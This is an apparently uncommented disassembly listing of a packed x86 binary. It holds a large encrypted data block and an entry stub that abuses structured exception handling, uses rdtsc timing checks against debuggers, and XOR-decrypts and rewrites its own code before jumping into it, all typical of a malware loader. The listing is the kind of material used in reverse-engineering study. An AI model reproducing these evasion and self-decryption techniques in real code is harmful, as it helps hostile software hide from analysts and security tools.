		dd 5B0AAB68h, 0A1D96392h, 0EFB6F250h, 0F0DDA327h, 0FD88F6C7h
		dd 8BD0209Dh, 904C8437h, 5172058h, 0D03E7FB8h, 0E7D88C8h
		dd 954B7F47h, 305E9F18h, 6F484577h, 74ABE02Eh, 504B531Ch
		dd 0BF33135Ah, 0C2EB48CEh, 0A308A918h, 146CA479h, 194CBCF1h
		dd 10D3E4F4h, 8B2909F3h, 4D73D737h, 4B691E2Ch, 0B6605D0h
		dd 0BA956ECh, 0EFE9BBE1h, 0CBE98EACh, 0FC3DE22Eh, 8B29C66Ch
		dd 6390E9ABh, 4B693E2Ch, 2350A905h, 0BA976ECh, 0F16DBFFEh
		dd 0CBE9AEACh, 0B1ADFFC8h, 0E557E66Ch, 90FE3F98h, 4F99C903h
		dd 5356BF87h, 1FC1745Ah, 0D3B77F46h, 686CCAD9h,	0AF7D9010h
		dd 563D68E7h, 0F6C8361Eh, 0B2F011E0h, 0D3EC809Ah, 5B4E829Ah
		dd 0F81086D2h, 0CF9755EDh, 0D780027Bh, 28AD8AC9h, 6F3D28D0h
		dd 0B312A0A7h, 80B84B0Bh, 0D60EE59Ah, 0FBE2808Eh, 6800CAFFh
		dd 53724052h, 6118F86Dh, 6F3D08D0h, 0B0E998A7h,	28C4078h
		dd 10F96DECh, 0E6A34A46h, 30D0A533h, 0FB08C0F8h, 0FD6B5FFAh
		dd 0A6F098ADh, 473F0B58h, 55FF83A2h, 0F01E5813h, 184880B8h
		dd 0F1A835D7h, 0D57ECB18h, 709ED891h, 0F6CE7539h, 5BCDA955h
		dd 598DB66Bh, 0F22856A0h, 1D2E86CDh, 348385E9h,	7589CD9Eh
		dd 0CC404B7Eh, 1B37FFC7h, 2561141Bh, 0D03E7FCCh, 75DFA333h
		dd 107EB833h, 3868A0D8h, 544855F7h, 0EC404AA4h,	1937FFC7h
		dd 86D798CDh, 598DB678h, 0F12856A0h, 214784CDh,	0F043A233h
		dd 0D57F0353h, 709ED893h, 98C80038h, 3562072Ch,	0D03E78FDh
		dd 96238059h, 760D0BB5h, 9A901073h, 680D4572h, 9069E02Eh
		dd 0F4AF0523h, 834326D1h, 3BA326B8h, 7F4CD88Ah,	9AE380BDh
		dd 650255Dh, 91D0C4F8h,	0B303F8F8h, 0B023FC88h,	0B003983Eh
		dd 0C9E3EB1Eh, 187064F2h, 0EFB774A1h, 0F1BAA455h, 55EEC818h
		dd 0DBCE2091h, 7803D3h,	0E8EA4AF2h, 2FFC4090h, 84FAE467h
		dd 4840EA8Ah, 0CF9B5430h, 22423E07h, 8E6D94DBh,	6E0174F2h
		dd 4E335492h, 2E0434B2h, 0E241452h, 0A044F472h,	80A54B21h
		dd 0E0412B05h, 0C06D0BEDh, 5309EBC0h, 88709DD5h, 55FF404Eh
		dd 0F01E5813h, 904880B8h, 50D8A3ACh, 0DB0D3752h, 70A8D620h
		dd 0E4C00038h, 3BBD985Fh, 9FA34094h, 0C8A3E56Fh, 104B808Eh
		dd 0B467A1D8h, 5088C02Fh, 0DB0208A8h, 0AF6CBDB1h, 5858206Eh
		dd 6D81EBD2h, 0F01E5F30h, 28C3054Fh, 306BA0EEh,	45FCC0F8h
		dd 482365EFh, 90C8000Eh, 0B59C2158h, 2FF68190h,	5AC1D067h
		dd 0B4CD0B13h, 0BB6896E7h, 0D940EB37h, 46974CA5h, 6C808938h
		dd 4F8C47E0h, 103BEB4Eh, 75DFCBFEh, 107EB833h, 3068A0DBh
		dd 0D57ECE8Ch, 709ED891h, 78CD74B8h, 4F17DE1Ah,	596C27C0h
		dd 301BCBBEh, 95BF2BDEh, 305E9853h, 5088C0FBh, 0F55EB56Ch
		dd 90FE38B1h, 58ED55D8h, 2FF7BE66h, 0FD5C470h, 0F8683047h
		dd 0CF975B6Eh, 0E8EEF91Bh, 0DBCEF5E7h, 543ABA9h, 0B0DE18D3h
		dd 12FF928Fh, 0F028609Bh, 6EA094CDh, 80975F25h,	0AB1828E7h
		dd 0C8CE1FE7h, 3BAE15C7h, 7F638BC9h, 0EFA4C5F3h, 380360AEh
		dd 0E7B4C831h, 6502B5Dh, 5088C3F8h, 87869418h, 0A6F08BBDh
		dd 0B0E82058h, 272A347Eh, 0C610EB1Dh, 104880B8h, 0D86DD5D9h
		dd 0AF773D0Ah, 482365EFh, 90C8000Eh, 0B59C2458h, 2FF64D90h
		dd 7BAD9767h, 1448B680h, 4468A0D8h, 0AEEF28EFh,	59101FE7h
		dd 3B00FEF8h, 0C42828E0h, 0A5B0EB7Ch, 5B4F8B60h, 28C3054Fh
		dd 3060A0EEh, 1FFDC0F8h, 48215D98h, 0E4C8000Eh,	4ED3C81Eh
		dd 0F9B0BF87h, 0FAE14980h, 2670051Dh, 338C60D8h, 680D65F2h
		dd 0C003E02Eh, 1542AA89h, 0B0DE18D1h, 0DA48F0D2h, 0C610E51Dh
		dd 0A82E2AB8h, 0B59F5D3Ah, 50BEF873h, 70A8E008h, 0D978074Ch
		dd 0C55046F2h, 60A32684h, 301BCA70h, 80F50913h,	0C76896E7h
		dd 66B04B7Dh, 70A8C018h
		dd 20C17538h, 336D2A00h, 7A087640h, 30A9D8FEh, 28C3054Fh
		dd 3028A0EEh, 53FCC0F8h, 7A802498h, 0A6F0839Dh,	39434658h
		dd 0E637D4C5h, 75DFCB98h, 107EB833h, 7068A0D8h,	38C98Dh
		dd 482B651Ah, 6762000Eh, 86D0ABDDh, 0D008C078h,	40231598h
		dd 94CD8A00h, 9A6896E0h, 0E8EEFD13h, 0F55FF829h, 90FE38B3h
		dd 0B0E82158h, 0F9B8420Ch, 0C8ACC592h, 0F488808Eh, 0B4CDAADBh
		dd 3688F6C0h, 0F11086B3h, 1B4DF7C8h, 0B0E81660h, 0A508407Ah
		dd 0FAE0D49Ah, 2670041Dh, 0B9C3C6D8h, 66B77045h, 58305818h
		dd 67630038h, 86D0ABDDh, 0D0084878h, 18591498h,	0EFB77D89h
		dd 8E3252Fh, 5488C0CEh,	7BDDE018h, 15C2B888h, 0B0DE18DDh
		dd 2745ABD2h, 0C610EB1Dh, 104080B8h, 5679D5D8h,	5A684340h
		dd 469065BDh, 0A3636638h, 0A5038A98h, 0C821F81Eh, 0C8ADC592h
		dd 0F488808Eh, 0B5CDAADBh, 3688F6C0h, 0FB2D17B3h, 90C83600h
		dd 0D6E82048h, 0A4C8C1C0h, 0F8ECE09Bh, 28CD25B2h, 9B0EA0EEh
		dd 0D90D76F7h, 0DBA8D620h, 6F34C0D0h, 3B6DD7A7h, 0D0087640h
		dd 84686098h, 121830B1h, 650235Dh, 0D57F6AF8h, 709ED893h
		dd 90C82038h, 0B29DA6E8h, 9F85447Ch, 738DEA66h,	9948B680h
		dd 6573855h, 0D023A6F8h, 77DDE5E4h, 0DF480088h,	584260A7h
		dd 2FF7BC01h, 0C8A3E56Fh, 5048808Eh, 880EA0D8h,	52FDF19Eh
		dd 0DBCEC9ACh, 15C21888h, 0B0DE18DDh, 7A0BA0B8h, 0FD43470h
		dd 0E7C03047h, 6502B5Dh, 5008C0F8h, 0C0AA9518h,	136D8ABEh
		dd 0D6E81660h, 0D5F4C0D3h, 0F09867EDh, 50B7CF38h, 0CC434872h
		dd 0D57F3F07h, 709ED893h, 90C90038h, 0F0582B2Dh, 0E88BC572h
		dd 1B8260AEh, 93F0E6B7h, 0B3CDAA18h, 3688F6C0h,	0DAA950B3h
		dd 0A84385CFh, 0B0E8206Eh, 0FF7D407Ah, 0C8A3E56Fh, 1048808Eh
		dd 2A1DA0DCh, 0D5820048h, 709ED89Dh, 0A842A5B2h, 5029206Eh
		dd 0B6B02668h, 0F098CB19h, 50F88853h, 8ED25D2h,	0A722C0CEh
		dd 46906B9Dh, 98C80038h, 0D6F85558h, 0DAE0C3C0h, 0C610E43Dh
		dd 0A0E3E6B8h, 80604BD9h, 0D40DCAB0h, 0DAA8D620h, 0A84385CFh
		dd 0B0E8206Eh, 0A5B94068h, 484E45EDh, 0B542783Bh, 305E985Ch
		dd 90BB6B9Eh, 0E815C9B2h, 67C83607h, 86D0ABDDh,	0F0084078h
		dd 41371598h, 76536BCFh, 3A70A960h, 66B0445Dh, 734C2018h
		dd 0A84CA532h, 1B8E206Eh, 0EF90FD51h, 31A260AEh, 2FD02532h
		dd 9B0EA0EEh, 0D58A9848h, 709ED89Bh, 1B4DF792h,	0B3E81660h
		dd 0A4094078h, 7BAD97BAh, 1048B680h, 456CA0D8h,	0DB0D37EEh
		dd 70A8D620h, 0E5CB0038h, 4A6CC85Dh, 7BE0BF87h,	7D79F62h
		dd 26700B3Dh, 3068A0D8h, 0E08BB4F0h, 0F55F4AD1h, 90FE38B3h
		dd 30E82058h, 0D7B8600Ch, 0C8ABE5B2h, 0F089808Eh, 38E1ADC2h
		dd 0F58AC0DCh, 709ED89Bh, 10CBE4F8h, 43249Ch, 686EEA19h
		dd 55228067h, 107EB83Bh, 0B59F0BBEh, 50BEF873h,	70A8E038h
		dd 153F534Ch, 0B0DE18D3h, 0F0084078h, 37DF6DECh, 104880BBh
		dd 0A0D8A5ACh, 0DB7B2B52h, 0E0256BDFh, 0BBC83607h, 4CA9A999h
		dd 550218C8h, 0F01E581Bh, 9BCD7712h, 306896E0h,	248880F8h
		dd 20108614h, 134D0AFBh, 5BE81660h, 2FB02672h, 738D6A78h
		dd 7648B680h, 0BBED5773h, 5388F6C0h, 4A9E018h, 1B4DF74Bh
		dd 0B0E81660h, 0A4284078h, 0F3EF9795h, 644880B8h, 9AF810DDh
		dd 9F033313h, 4F006593h, 58E3000Eh, 831468D1h, 5B8DB7B1h
		dd 0F02856A0h, 654800B8h, 0B3ED2DD6h, 0DA88F6C0h, 8928A010h
		dd 1D30733Bh, 94ACED5Ch, 30C94068h, 5BA3D090h, 0A82E865Bh
		dd 9B0E60E9h, 0D007789Eh, 70A85870h, 0F6290238h, 354378F3h
		dd 0B60E35B1h, 96E85120h, 0BA8B3013h, 8F02555h,	0D57FC0CEh
		dd 709ED893h, 80C80038h, 9BBF262Dh, 0C9E31880h,	0DB003313h
		dd 9B98AB40h, 6571055h,	0C01DC1F8h, 71A8D627h, 0B48C8B01h
		dd 0D855A95Ch, 5B087668h, 0C617F425h, 80CDABB8h, 0C76896E7h
		dd 66B04B7Dh, 70A8A018h, 67CA7438h, 0B42A8B80h,	535F1678h
		dd 0C617A825h, 944780B8h, 3068A101h, 5088CD10h,	22EDAB18h
		dd 0A3844576h, 0FCAC0E6Ah, 45F74034h, 0F01E5BE2h, 2F940531h
		dd 0BB3BA0EEh, 888BFCA0h, 0FB8093E7h, 7020347Bh, 3B17DFADh
		dd 0E637FCEDh, 0B22B3B98h, 0F0CD09B4h, 336896E7h, 0D501C8BAh
		dd 709EDFFCh, 6FE073B3h, 0B0E8A0EBh, 25B1A878h,	4DA39F67h
		dd 107EBF04h, 0C5C5488Eh, 0C5033F07h, 709EDFA4h, 93C04AB3h
		dd 7EC32C12h, 0DF0DA9FBh, 0F0290010h, 4ACC8FB8h, 3368A0D9h
		dd 66B7004Dh, 0F01DE318h, 3CC83607h, 35E7C864h,	0D00840DAh
		dd 0DB2C2615h, 2677003Dh, 606EA3D8h, 0AF7DAA10h, 0CC1563E7h
		dd 90C83607h, 0F7D32B2Dh, 0CB8B4F74h, 1B286099h, 0ACDDB9B4h
		dd 3F6896E7h, 5089CD7Dh, 0F02DE318h, 0F6C83607h, 951718D9h
		dd 0D0F4C577h, 0B0A36098h, 240BABBAh, 0C5454888h, 0EDB13F07h
		dd 709EDFA4h, 902C8537h, 35EB2058h, 0D03E7FB8h,	0CFA8E59Bh
		dd 10C3808Eh, 3F64E7F3h, 50880D7Ah, 78EFDB18h, 900C8337h
		dd 706B2058h, 0C44F437Ah, 0CFA8E59Bh, 401A808Eh, 0FB41527h
		dd 0C577C0CEh, 709EDB22h, 9F088562h, 0B0E897DDh, 0D094A978h
		dd 0F146098h, 10DC05B7h, 0EE8A0D8h, 0DB0DCFEDh,	0FBA8E018h
		dd 0D3E3017Eh, 0C00706Ch, 0E9F7BF8Ch, 0C617DC25h, 133FF5B8h
		dd 657605Dh, 0D00DC3F8h, 0F9A8D627h, 0A6F7E8BDh, 8BE8AB58h
		dd 0E637A0FDh, 0CB201298h, 2677643Dh, 0D01D2D8h, 2088C0F8h
		dd 6F40D76Ah, 1DC80038h, 7163DC16h, 920B4253h, 18AD5B88h
		dd 6548B687h, 20AC23D4h, 1407F107h, 9BC9FC3Ch, 1547C323h
		dd 0B0DE1FF8h, 50BDCB18h, 182856A7h, 0EFB775E2h, 306809B9h
		dd 5EFD40F8h, 2A4A733h,	988F3B31h, 4FD4A257h, 0DF41BF87h
		dd 0FD6D21Dh, 34740B47h, 18E30759h, 0AF77C0F8h,	32439FE7h
		dd 0F0EC4AB9h, 0FE082058h, 0DC83804Bh, 38ADE7BCh, 9948B687h
		dd 657645Dh, 0DF314DF8h, 73A8E030h, 0A6F780BDh,	154D4658h
		dd 0D3CE6B36h, 0B20374DAh, 0EB0E46B4h, 63E96730h, 5588C0F8h
		dd 0F9A8E018h, 0CE97FC7Eh, 2517779Bh, 0D03E7BFEh, 0FF378859h
		dd 10499A3Dh, 5A3CF0D8h, 0AF77AAD0h, 4693068Dh,	0CF088538h
		dd 0B1EDA857h, 8AE04078h, 18D79F7Dh, 104880A9h,	761CC58Bh
		dd 3EDAC91h, 2DD837Dh, 0D1B17451h, 0E45DDF58h, 2F087647h
		dd 0C6135A0Dh, 4CCD09B8h, 0D86896E7h, 5088C0E1h, 11FC854Bh
		dd 0E7876553h, 0C39A4536h, 80782910h, 995E09EAh, 752FE5D4h
		dd 1B80F7D8h, 0B8773F11h, 70A8E00Bh, 0F59A656Bh, 0C287542Bh
		dd 0B97A101Dh, 954409EEh, 4748E5DFh, 0CF81AD30h, 509A2807h
		dd 15FBE018h, 0FBAB617Ah, 0C2B8502Dh, 0BC613611h, 0F04D07FDh
		dd 0F8B868EFh, 28805F27h, 388C0F8h, 11C0A37Dh, 0DEAD6756h
		dd 0D6815437h, 0B97A1001h, 954409EEh, 4748E5DFh, 0CF806D30h
		dd 0DDDC9007h, 4692789Dh, 0C0AC6A38h, 4FBF2132h, 0E633B2EDh
		dd 0D414E998h, 2B661547h, 0F042A0EEh, 6ED87D75h, 20F8E02Eh
		dd 87DFF68h, 0D8E81662h, 0D00C4079h, 0A7290ACCh, 2F141547h
		dd 5A3CA0EEh, 0C57797FCh, 709EDF44h, 6FDCC4BBh,	86D774EDh
		dd 0BA9DBF78h, 0AF2856A3h, 40FD0D7Bh, 666896E6h, 6BE65507h
		dd 882BE02Eh, 2B4C0FC7h, 39E82058h, 0E63720FDh,	0A6280A98h
		dd 2BE21547h, 0F0EDA0EEh, 502C44F7h, 0B083E018h, 93A25068h
		dd 0D8E94A08h, 10084078h, 0BABD9FCEh, 9348B683h, 0B4675F20h
		dd 5088C510h, 4FCC6591h
		dd 1D45000Eh, 0B0DE1F30h, 0EF78D5F5h, 0A27960AEh, 0EF1880D2h
		dd 653D64Dh, 0AF7043F8h, 751E6417h, 90A20038h, 8F8C95A7h
		dd 45F7404Eh, 0F01E5BEAh, 1FB7783Bh, 306D3F5Ch,	280D49F8h
		dd 43A8D627h, 0C10B03F1h, 0B4827108h, 0B4BDBF29h, 0F2856A7h
		dd 2673CE2Dh, 3FA825D8h, 508DBB7Ch, 0F961D318h,	0A6F77CBDh
		dd 0E1B97158h, 0DF085F10h, 65D73098h, 107EBB2Eh, 0B467605Dh
		dd 5088C5CCh, 4F286591h, 280B000Eh, 0B0E84FB7h,	27300BF3h
		dd 0C610EB1Dh, 104880B8h, 336ED5C8h, 6698A87Dh,	737AD318h
		dd 6739F7F9h, 3C6DA9B9h, 68087647h, 0F028480Fh,	1374CB33h
		dd 678C85Dh, 535AF3F8h,	875917D9h, 144D89D9h, 73E81667h
		dd 0D643F777h, 7D1D8361h, 0A74798EBh, 0E06BB49Bh, 7849ABB1h
		dd 4A29301Bh, 0FEA17767h, 33F554A1h, 0A2094C02h, 0CC63EB78h
		dd 135CC233h, 74E5B09Ah, 897F3FB0h, 0F593213Bh,	90FE3F40h
		dd 94BCAB9Bh, 5FC87368h, 0F028D81Ah, 0DFC343B8h, 8DE5AB33h
		dd 50BEFEA8h, 43776BE4h, 0F1F4ACF1h, 0CAD4262Ah, 0F024420Fh
		dd 84745C32h, 6466BC54h, 45689C05h, 0DB412310h,	28EDDD19h
		dd 9BBC007Dh, 0E2AB7365h, 0E38D4F78h, 7BD79F67h, 591FBDBBh
		dd 0B467E396h, 0AF773FDEh, 25EBB725h, 8B4C0F76h, 8D17DFA7h
		dd 0E23B032Fh, 0F38E497h, 40757F47h, 3F27F48Bh,	0AF77C57Ch
		dd 9873D3E7h, 6F37FE15h, 4A00302Dh, 38F7BF84h, 0FD79EB9h
		dd 0EEA404B7h, 0E25B5F27h, 5088D610h, 8FCB0818h, 9020FFC7h
		dd 0EDE82058h, 0E331ADF9h, 2BC160AEh, 744880BBh, 85E39227h
		dd 50BEFF78h, 168A697Ch, 0CA853EB9h, 0B32CA557h, 8E834078h
		dd 96F663A4h, 5518BB39h, 33DC25D7h, 137FC0F8h, 7088E00Eh
		dd 374D0F38h, 46E8205Bh, 0DF0A1C3Bh, 0F02BFD1Ch, 180B0BB8h
		dd 90C800E5h, 0DF0CCF58h, 4DA8E01Bh, 0B0E82018h, 0B36CA457h
		dd 69E04078h, 0FFD79F66h, 104BF93Ah, 0F4CD23D8h, 5088F6C7h
		dd 0FBA0A293h, 51E31072h, 70DB242Bh, 180B4593h,	79382A11h
		dd 2677083Dh, 3C22A3D8h, 5188C040h, 0DA40B118h,	0A037FFDFh
		dd 86D0A9CDh, 0E028F178h, 0C610EA2Dh, 0EE68EAB8h, 2410F811h
		dd 0AF6F5010h, 7F7A65E7h, 721BC2ACh, 8863B569h,	35E3404Eh
		dd 0C8A3E56Fh, 1048808Eh, 121CA1D8h, 6803450Fh,	70ABE02Eh
		dd 9CBD0038h, 886385D9h, 2FF7404Eh, 0FAC39B67h,	28C30D39h
		dd 3068A0EEh, 56E0C8F8h, 29A8E018h, 90C80650h, 0F2007858h
		dd 5AF7BF9Fh, 0C610E31Dh, 3ACC06B8h, 305E985Bh,	680B4570h
		dd 904AE02Eh, 0A84385CFh, 0B0E0206Eh, 0D97D4078h, 0C8ADDD18h
		dd 6449808Eh, 0BBED571Dh, 5088F6C0h, 4A0E018h, 13758023h
		dd 0B5E81660h, 6D88F00Ch, 0F01E581Ch, 90EFF4BDh, 6502565h
		dd 0CEFCC5F8h, 482365EFh, 90C8000Eh, 0B99CA058h, 0E88BFDF8h
		dd 872A60AEh, 0D8ED0331h, 306896E7h, 0AF7BC710h, 8DC908E7h
		dd 0E020FFC7h, 3BE8205Ah, 0E637C4E5h, 78B56398h, 0F848B687h
		dd 0CF975CA1h, 52D844F7h, 0C523E018h, 90FE3FB8h, 0B3D47ED3h
		dd 2D72A8A6h, 72279F67h, 10488282h, 504CEA59h, 0DB68C0F8h
		dd 73FEB2E6h, 0EACB1442h, 3B6DD748h, 0D0087640h, 85386098h
		dd 0DCF509ACh, 0BD6896E7h, 66B0584Dh, 18256B18h, 63C83628h
		dd 965177FCh, 5D084072h, 0C638602Dh, 0A1ED73B8h, 0C36A43D8h
		dd 0DB0D375Ch, 70A8D620h, 9FD80038h, 0B0E88EDCh, 0F87BBF78h
		dd 0FC6D670h, 0ACDD0B47h, 0B56896E7h, 0C80CCF2Ah, 0FBA8E018h
		dd 0A6F7808Dh, 0A0A2AB58h, 0B02C0AF9h, 0DBC86098h, 123B88F2h
		dd 426B69EBh, 3805FBECh, 0FBA8D608h, 0A6D868B5h, 3BBE5258h
		dd 758B6444h, 0F01E70F0h, 78EF03B8h, 3068A0D8h,	5180BA73h
		dd 87ABE852h, 1543F7BFh, 0B0DE1FCCh, 0E883C58Fh, 0F06860AEh
		dd 123C80B8h, 426BB82Fh, 0D9B8E9F4h, 469728ADh,	0B8BB8B38h
		dd 351F1059h, 0D03E78F3h, 0F02860D8h, 8BF82CCh,	0CC214889h
		dd 0BBD13F07h, 58DBE314h, 0C1C47213h, 0EF4CD30Eh, 48BDCD21h
		dd 792856A0h, 26774C05h, 6FCC53D8h, 0C2B9CFA6h,	707C6795h
		dd 5F20038h, 0B0DE18D1h, 261460Dh, 0E21C36E0h, 0F8B8D030h
		dd 0CF977A63h, 5CC24BA2h, 87B8AA1Bh, 0A6F08BBDh, 0B0E82058h
		dd 0D549CD68h, 7DA173EDh, 107EBF70h, 200025DBh,	0F70BC0CEh
		dd 70A8E070h, 0B88B2B38h, 0B0BBA7D1h, 55FF4078h, 0F01E5CD0h
		dd 104880B9h, 73AFA7ACh, 0F02860F0h, 0FB2D17B8h, 90C83600h
		dd 0C4682058h, 0AAE0127Fh, 0AAD79F6Fh, 2F800D33h, 358BA0EEh
		dd 0BBA08B71h, 0B4256B15h, 73C83607h, 3BEBCB5Ah, 55FF6833h
		dd 0F01E5813h, 104880BBh, 0B5E3B4ACh, 50BEFF34h, 4F106D1Bh
		dd 15CB000Eh, 0B0DE1FECh, 9A834879h, 74ADEB88h,	2948B687h
		dd 331BA892h, 51808A71h, 132BF05Ah, 15430060h, 0B0DE1FD4h
		dd 0D020D810h, 0F86A6198h, 400B81E1h, 8E13552h,	0D57FC0CEh
		dd 709ED893h, 80C80038h, 3DEB262Ch, 0D03E5010h,	75DF602Eh
		dd 107EB833h, 306AA0D8h, 9676D48Dh, 482365EFh, 90C8000Eh
		dd 0B69D205Ch, 0E882F5F2h, 75DF60AEh, 107EB833h, 3068E0D8h
		dd 5702CB8Dh, 7202221Ah, 7B3FE2EEh, 82EFAA51h, 60AEABAh
		dd 221B977Ah, 746A0BDCh, 0B330A257h, 66B7A445h,	0F4A7E018h
		dd 6F37FAE6h, 8F6895A7h, 45F7404Eh, 0F01E5B22h,	2F343547h
		dd 0A597A0EEh, 50BEFBD6h, 4FC06D95h, 545000Eh, 0B0DE1F28h
		dd 0D0621229h, 0CF4CD567h, 85B7808Eh, 305E9B76h, 6FEC7507h
		dd 0E557E02Eh, 90FE3B16h, 8EB895D5h, 65F7404Eh,	0F01E5FF8h
		dd 0BADD7FEEh, 0B36896E3h, 66B7A45Dh, 986BE018h, 90C80038h
		dd 31E94A05h, 0E63FD695h, 0FFD83898h, 53C0579h,	0F0EDA0EEh
		dd 0AF40433Bh, 0F569EFE8h, 90FE154Ch, 0B0F81D9Bh, 0CC7D4052h
		dd 0D454E1FEh, 6539ECB4h, 0F480C0CBh, 25773F07h, 8A7C081Dh
		dd 4220FFC7h, 0D117DFA7h, 0A825BF56h, 483A54CEh, 1048809Dh
		dd 0CFCD48B8h, 69FD3F07h, 408CA493h, 0AE98B5B5h, 0E063206Eh
		dd 0EA892670h, 0D55B629Eh, 1048E8EEh, 0F4E3A027h, 0DAC092h
		dd 4B5275E7h, 544B000Eh, 0ECD6A150h, 0A5547F47h, 0F4EEE39Bh
		dd 0EFB20150h, 0CF174827h, 93E93F07h, 70A894A0h, 2879EB38h
		dd 0B0E82077h, 0D0085D90h, 0F008A298h, 1048B000h, 307848D8h
		dd 744AC0F8h, 712D5818h, 93200038h, 72E82058h, 84854054h
		dd 0DEE56CBCh, 6C48783Bh, 3080C0C1h, 0DB88C0F8h, 2D98C44Ch
		dd 7D491AB3h, 0B0DE1835h, 2FE99490h, 0F4EA0167h, 134A87B8h
		dd 0D269A5DEh, 93FB9F03h, 3815FF6Ah, 8D004432h,	49h, 1CDh dup(0)
		dd 0FFE00000h, 12h, 13DAh dup(0)
		db 0

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

		public start

start		proc near
		push	ebp
		mov	ebp, esp
		call	loc_31432013
		call	sub_314320A5
		jmp	near ptr byte_31432058
start		endp

; ---------------------------------------------------------------------------


loc_31432013:				; CODE XREF: start+3p
		push	dword ptr fs:0
		mov	fs:0, esp
		mov	ds:dword_31432059, ebp
		xor	edx, edx
		push	edx
		push	edx
		push	edx
		push	edx
		push	edx
		push	edx
		push	80000000h
		push	1
		push	edx
		push	edx
		push	40h
		call	ds:dword_3142808C	; LoadLibraryA
		xor	edx, edx
		push	edx
		push	80000000h
		push	edx
		push	edx
		push	edx
		push	edx
		push	edx
		push	edx
		call	sub_31442001
; ---------------------------------------------------------------------------
		db 31h
byte_31432058	db 0BDh			; CODE XREF: start+Dj
dword_31432059	dd 12FFC0h		; DATA XREF: .gda_:3143201Fw
; ---------------------------------------------------------------------------
		sub	eax, eax


loc_3143205F:				; CODE XREF: .gda_:31432065j
		dec	al
		or	al, al
		jz	short loc_31432069
		jnz	short loc_3143205F
		jmp	short loc_314320D0
; ---------------------------------------------------------------------------


loc_31432069:				; CODE XREF: .gda_:31432063j
		call	$+5
		pop	esi
		add	esi, 44h
		sub	edi, edi
		or	edi, 2898h
		mov	ecx, 28h
		push	esi


loc_31432083:				; CODE XREF: .gda_:31432096j
		xchg	al, [esi]
		stc
		xor	ax, cx
		cld
		cld
		cld
		mov	[esi], al
		add	esi, 1
		sub	edi, 1
		or	edi, edi
		jnz	short loc_31432083
		pop	esi
		mov	ecx, [ebp-8]
		mov	fs:0, ecx
		leave
		jmp	esi

; =============== S U B	R O U T	I N E =======================================



sub_314320A5	proc near		; CODE XREF: start+8p

arg_C		= dword	ptr  10h

		mov	eax, [esp+arg_C]
		pop	dword ptr [eax+0B8h]
		xor	eax, eax
		retn
sub_314320A5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dw 0E8h
		dd 8B000000h, 89FC2404h, 2FCB98h, 8680F700h, 28h, 8B800000h
		dd 7404245Ch
; ---------------------------------------------------------------------------


loc_314320D0:				; CODE XREF: .gda_:31432067j
		sub	eax, 0CFB08959h
		das
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
		push	edi
		pop	dword ptr [eax+2FD3h]
		cmp	byte ptr [eax+288Ah], 0E8h
		jnz	short loc_314320F5
		add	ebx, [eax+288Bh]
		mov	ebx, [ebx+2]
		push	dword ptr [ebx]
		jmp	short loc_314320FD
; ---------------------------------------------------------------------------


loc_314320F5:				; CODE XREF: .gda_:314320E6j
		mov	ebx, [eax+288Ch]
		push	dword ptr [ebx]


loc_314320FD:				; CODE XREF: .gda_:314320F3j
		pop	ebx
		push	ebp
		mov	ebp, eax
		sub	dword ptr [esp+4], 80B6h
		sub	ebp, 361005h
		mov	edi, [esp+4]
		lea	esi, [ebp+363898h]
		mov	ecx, 0
		rep movsb
		call	sub_31432173
		mov	ecx, eax
		call	sub_31432173
		sub	eax, ecx
		jz	short loc_31432147
		cmp	eax, 100h
		ja	short loc_31432147
		lea	eax, [ebp+3610D4h]
		mov	dl, [eax-10h]
		call	sub_31432177
		jmp	short loc_31432186
; ---------------------------------------------------------------------------


loc_31432147:				; CODE XREF: .gda_:3143212Ej
					; .gda_:31432135j
		test	dword ptr [ebp+36388Bh], 80000000h
		jz	short loc_31432171
		lea	esi, [ebp+36388Fh]
		mov	edi, [esp+4]
		movsb
		movsd
		mov	esi, [ebp+363FD4h]
		mov	edi, [ebp+363FD8h]
		mov	ebx, [ebp+363FD0h]


loc_31432171:				; CODE XREF: .gda_:31432151j
		pop	ebp
		retn

; =============== S U B	R O U T	I N E =======================================



sub_31432173	proc near		; CODE XREF: .gda_:31432120p
					; .gda_:31432127p
		rdtsc
		retn
sub_31432173	endp

; ---------------------------------------------------------------------------
		db 18h

; =============== S U B	R O U T	I N E =======================================



sub_31432177	proc near		; CODE XREF: .gda_:31432140p
		mov	dh, dl
		mov	ecx, 27B7h


loc_3143217E:				; CODE XREF: sub_31432177+Cj
		xor	[eax], dl
		inc	eax
		add	dl, dh
		loop	loc_3143217E
		retn
sub_31432177	endp

; ---------------------------------------------------------------------------


loc_31432186:				; CODE XREF: .gda_:31432145j
		cdq
		ror	dword ptr [eax-70h], cl
		xchg	ebp, [edi+29h]
		mov	ebx, 4960A496h
		dec	ebx


loc_31432193:				; CODE XREF: .gda_:31432199j
		and	al, 60h
		add	[ebx-50h], esi
		leave
		loopne	loc_31432193
		db	65h
		mov	ebx, 9CCB739Bh
		ficom	word ptr [ecx-30h]
		push	eax
		pop	ebp
		inc	ebp
		movsb
		jmp	short loc_314321D3
; ---------------------------------------------------------------------------
		db 0E8h
; ---------------------------------------------------------------------------
		stosd
		adc	edx, [ebx-7Eh]
		sub	[ebx+736B4872h], ch
		leave
		sbb	eax, 919E23CBh
		push	eax
		inc	edx
		sub	al, 20h
		std
		test	eax, 6FEDA839h
		jnp	short loc_31432239
		sub	al, 14h
		jge	short near ptr loc_3143223B+3
		inc	edx
		cdq
		test	[ebx], esi
		and	[esp+ebx], ebp


loc_314321D3:				; CODE XREF: .gda_:314321A9j
		fistp	dword ptr [edx]
		movsb
		sal	dword ptr [ebx+144FEF3Bh], 66h
		retf
; ---------------------------------------------------------------------------
		dw 6C22h
		dd 0E4335B8Bh, 0D8EB036Fh, 90786044h, 83B7ACEBh, 3E59686Dh
		dd 0B0FDEC0Ch, 992E1F9Bh, 46636EADh, 0D0B54888h, 425B00E8h
		dd 0F50C012Dh, 9EBDB6EDh, 338617Ch, 35115697h, 10CEDBFAh
		dd 70584DC0h, 0A4DDE788h, 446B61A4h, 0FF0A120Dh, 0F8BC0DAh
		db 0DEh, 0A9h, 0BDh
; ---------------------------------------------------------------------------


loc_31432233:				; CODE XREF: .gda_:loc_31432239j
		push	bx
		mov	dh, 98h
		pop	eax
; ---------------------------------------------------------------------------
		db 0Bh
; ---------------------------------------------------------------------------


loc_31432239:				; CODE XREF: .gda_:314321C6j
		jecxz	short loc_31432233


loc_3143223B:				; CODE XREF: .gda_:314321CAj
		adc	[ebp-740BA880h], ch


loc_31432241:				; CODE XREF: .gda_:3143229Aj
		pop	edi
		inc	edi
